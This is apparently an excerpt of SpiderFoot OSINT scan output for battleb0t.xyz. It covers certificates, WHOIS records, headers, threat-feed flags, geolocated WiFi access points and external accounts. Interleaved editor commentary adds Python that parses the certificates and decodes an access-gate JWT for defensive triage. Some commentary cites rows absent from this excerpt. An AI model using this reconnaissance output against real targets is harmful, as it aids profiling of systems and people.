| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:1A:2A:02:E8:38) | 40.2024, 29.0398 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:41 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 104.196.30.220 |
| 2023-05-12 02:49:19 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b6:39:33:af:de:1e:32:f3:fc:2e:76:dc:bc:08:51:86:10
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 25 01:39:25 2023 GMT
Not After : May 26 01:39:24 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
0a:22:b1:e9:af:d4:a9:74:88:84:74:c6:0c:06:4e:88:44:eb:
3d:8b:ff:0f:67:9b:d9:59:64:93:86:9d:3a:67:d2:a0:3e:52:
6d:1c:e7:15:10:f3:f5:51:a1:19:bc:c1:17:81:af:6e:00:02:
2c:2b:94:b9:a1:29:49:0c:d6:a8:59:00:4b:47:60:f7:bf:4d:
a5:8e:dc:6c:e7:62:2f:6e:45:28:27:5d:0b:af:59:e7:df:13:
7b:cf:b2:a2:da:32:8d:b4:3a:0a:9a:bf:a9:4a:e7:ca:7c:b6:
03:94:66:c9:f3:4e:8b:df:cb:62:a9:c2:05:d7:41:e7:96:0d:
2f:fd:52:d1:77:82:07:ba:c9:49:53:9d:54:ee:70:d1:90:b1:
a3:cc:e7:9c:0c:45:e3:02:85:7d:b0:fb:ec:d0:7e:53:65:3b:
df:c8:91:a1:21:7f:e2:6c:76:54:71:ce:4e:bd:b9:b8:30:a1:
c2:bc:22:2f:5c:87:b2:76:87:ed:5e:2b:71:c5:82:1c:b7:14:
13:1b:f2:3d:0c:ee:c2:59:8f:7f:d2:9f:b0:78:9f:80:1f:ba:
8b:65:58:fc:3c:40:e8:02:39:06:f7:24:58:38:34:e0:0d:b2:
2e:8a:82:16:b9:ac:3d:73:4d:68:a6:f4:81:4c:48:22:6d:44:
3e:f3:16:30
| battleb0t.xyz |
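Both Certificate Transparency rows above end in `CT Precertificate Poison: critical`, which means they are the precertificates Let's Encrypt submitted to CT logs, not the leaf certificates the hosts actually serve (the served leaf carries SCTs in place of the poison extension). The first one had also expired two weeks before the scan date. The check below is added here as an editor's example and is not part of the SpiderFoot output: it parses the openssl text form the scanner stored and annotates each row with SAN coverage, key size, precert status and validity remaining at the row's "Date Found". The two inputs are trimmed excerpts of the rows above (only the indentation is mine); the regexes assume that openssl text layout.

```python
import re
from datetime import datetime

# Excerpts of the two Certificate Transparency rows above, in the openssl text
# form the scanner stored, trimmed to the fields this triage reads. The values
# are copied from those rows; only the indentation is mine.
CERT_NWAPI = """\
Certificate:
    Data:
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Jan 27 17:54:05 2023 GMT
            Not After : Apr 27 17:54:04 2023 GMT
        Subject: CN=nwapi.battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (4096 bit)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:nwapi.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""

CERT_APEX = """\
Certificate:
    Data:
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Feb 25 01:39:25 2023 GMT
            Not After : May 26 01:39:24 2023 GMT
        Subject: CN=battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""

OPENSSL_DATE = "%b %d %H:%M:%S %Y GMT"   # e.g. "May 26 01:39:24 2023 GMT"


def _grab(text, pattern):
    m = re.search(pattern, text, re.MULTILINE)
    return m.group(1).strip() if m else None


def parse_cert_text(text):
    """Pull the triage-relevant fields out of `openssl x509 -text` output."""
    subject = _grab(text, r"^\s*Subject:\s*(.+)$") or ""
    issuer = _grab(text, r"^\s*Issuer:\s*(.+)$") or ""
    san_line = _grab(text, r"Subject Alternative Name:\s*\n\s*(.+)$") or ""
    return {
        "subject_cn": _grab(subject, r"CN=([^,/]+)"),
        "issuer_cn": _grab(issuer, r"CN=([^,/]+)"),
        "sans": re.findall(r"DNS:([^,\s]+)", san_line),
        "key_bits": int(_grab(text, r"RSA Public-Key:\s*\((\d+) bit\)") or 0),
        "not_before": datetime.strptime(_grab(text, r"^\s*Not Before\s*:\s*(.+)$"), OPENSSL_DATE),
        "not_after": datetime.strptime(_grab(text, r"^\s*Not After\s*:\s*(.+)$"), OPENSSL_DATE),
        # The poison extension marks a precertificate submitted to CT logs; the
        # leaf actually served carries SCTs instead and is a different object.
        "is_precert": "CT Precertificate Poison" in text,
    }


def triage(text, observed_at):
    """Annotate one CT row as an analyst would: is it a precert, what names does
    it cover, and how much validity was left when the scanner saw it."""
    cert = parse_cert_text(text)
    cert["days_left"] = (cert["not_after"] - observed_at).days
    cert["expired_at_scan"] = observed_at > cert["not_after"]
    return cert


if __name__ == "__main__":
    # Observation times are the "Date Found" values of the two rows.
    for label, text, seen in (
        ("nwapi", CERT_NWAPI, datetime(2023, 5, 12, 2, 48, 7)),
        ("apex", CERT_APEX, datetime(2023, 5, 12, 2, 49, 19)),
    ):
        c = triage(text, seen)
        print(label, c["subject_cn"], c["sans"], c["key_bits"],
              "precert" if c["is_precert"] else "leaf",
              "days_left=%d" % c["days_left"],
              "EXPIRED" if c["expired_at_scan"] else "")
```

Two caveats the output makes visible: a CT row is evidence that a certificate was requested for a name, not that the name currently serves it (the nwapi precert had expired before the scan, yet the Wappalyzer row found Express answering on that host, so a newer certificate must have been in use); and the CertSpotter "SSL Certificate Expiring" value of 2023-05-25 matches neither certificate shown here, so expiry has to be read per certificate rather than per domain.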
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:27:12) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Wikidot (Category: social)
http://www.wikidot.com/user:info/login | login |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.136 | 34.148.97.127 |
| 2023-05-12 02:44:14 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | pics.battleb0t.xyz |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [010916hao.github.io]
https://www.openphish.com/feed.txt | 010916hao.github.io |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-108-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-108-154.github.com |
| 2023-05-12 02:44:18 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.110.153:443 | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Chamsko (Category: images)
https://www.chamsko.pl/profil/login | login |
| 2023-05-12 03:00:55 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00indahouse.github.io | 185.199.111.153 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery | pics.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:BB:17:A7) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:10:12 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [172.67.128.0/20]
http://www.voipbl.org/update | 172.67.128.0/20 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:F9:8E:4E) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5a3c76a8562af2-ORD
| 188.114.97.1 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Monkeytown (Net ID: 00:02:2D:29:53:67) | 37.7642, -122.3993 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | San Francisco (South Beach), California, 94107, United States, North America |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:443 | 188.114.97.0/24 |
| 2023-05-12 02:54:22 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 403 | www.ayhu.xyz |
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 2 | 0 | 4 | 0 | None | https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.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%3D | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBhbmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5NzhlZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNlLCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJlc2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRoX3N0YXR1cyI6Ik5PTkUifQ.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg |
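The row above is the spider being bounced from panel.battleb0t.xyz to a Cloudflare Access login page for the `qolhub` team, whose identity provider is GitHub (the linked URL is GitHub's OAuth authorize endpoint with a callback on qolhub.cloudflareaccess.com). The `meta` query parameter is a JWT minted by Access, and reading its claims tells an analyst what the edge knows about the request without touching the target again. The decoder below is an added example, not SpiderFoot code: it parses the login URL copied from the row, base64url-decodes the token's header and claims, and reports the fields that matter for triage. It does not verify the RS256 signature (that would need the team's published Access signing key, which an offline check cannot fetch), so every claim is treated as untrusted input; the meaning of `hostname`, `aud`, `auth_status` and `mtls_auth` is taken from the claim names as they appear in the token.

```python
import base64
import json
from urllib.parse import parse_qs, urlparse

# The Cloudflare Access login URL recorded by the Web Spider row above for
# panel.battleb0t.xyz, copied from the scan data. The `meta` parameter is a
# JWT issued by Access, not by the application behind it.
ACCESS_LOGIN_URL = (
    "https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz"
    "?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3"
    "&redirect_url=%2F"
    "&meta="
    "eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ"
    "."
    "eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBl"
    "OGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBh"
    "bmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5Nzhl"
    "ZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNl"
    "LCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJl"
    "c2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRo"
    "X3N0YXR1cyI6Ik5PTkUifQ"
    "."
    "nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN"
    "0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE"
    "_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWv"
    "ZYkQfxCCgFAewQtUM8EIB0Sx1pQUg"
)


def b64url_decode(segment):
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Split a compact JWS into header, claims and the raw signature segment.
    Nothing is verified here: checking the RS256 signature needs the team's
    published Access signing key, which this offline check does not fetch.
    Treat the claims as untrusted input describing what the edge asserts."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            signature_b64)


def summarize_access_login(url):
    """Reduce the login URL to what matters in triage: which Access team and
    application front the hostname, whether the client presented any credential
    (mTLS cert or service token), and when the token was minted."""
    parts = urlparse(url)
    query = parse_qs(parts.query)
    header, claims, _ = decode_jwt_unverified(query["meta"][0])
    return {
        "team": parts.netloc.split(".")[0],        # <team>.cloudflareaccess.com
        "app_hostname": claims.get("hostname"),
        "app_id": claims.get("aud"),
        "kid_matches_aud": query["kid"][0] == claims.get("aud"),
        "alg": header.get("alg"),
        "token_type": claims.get("type"),
        "auth_status": claims.get("auth_status"),
        "mtls_cert_presented": claims.get("mtls_auth", {}).get("cert_presented"),
        "service_token": claims.get("service_token_status"),
        "issued_at": claims.get("iat"),
        "redirect_url": claims.get("redirect_url"),
    }


if __name__ == "__main__":
    print(json.dumps(summarize_access_login(ACCESS_LOGIN_URL), indent=2))
```

For this row the result says: application `0e8fcd5c…` on team `qolhub` fronts panel.battleb0t.xyz, the `kid` in the URL is the same value as the token's `aud`, no client certificate or service token was presented, and `auth_status` is `NONE`, which is exactly the state a scanner with no identity should see. None of this is a finding against the target; it is what a correctly configured Access policy looks like from the outside, and the `meta` token should not be mistaken for a session credential.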
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@web.com | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
|
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nuke.battleb0t.xyz | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>nuke.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:20 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=nuke.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
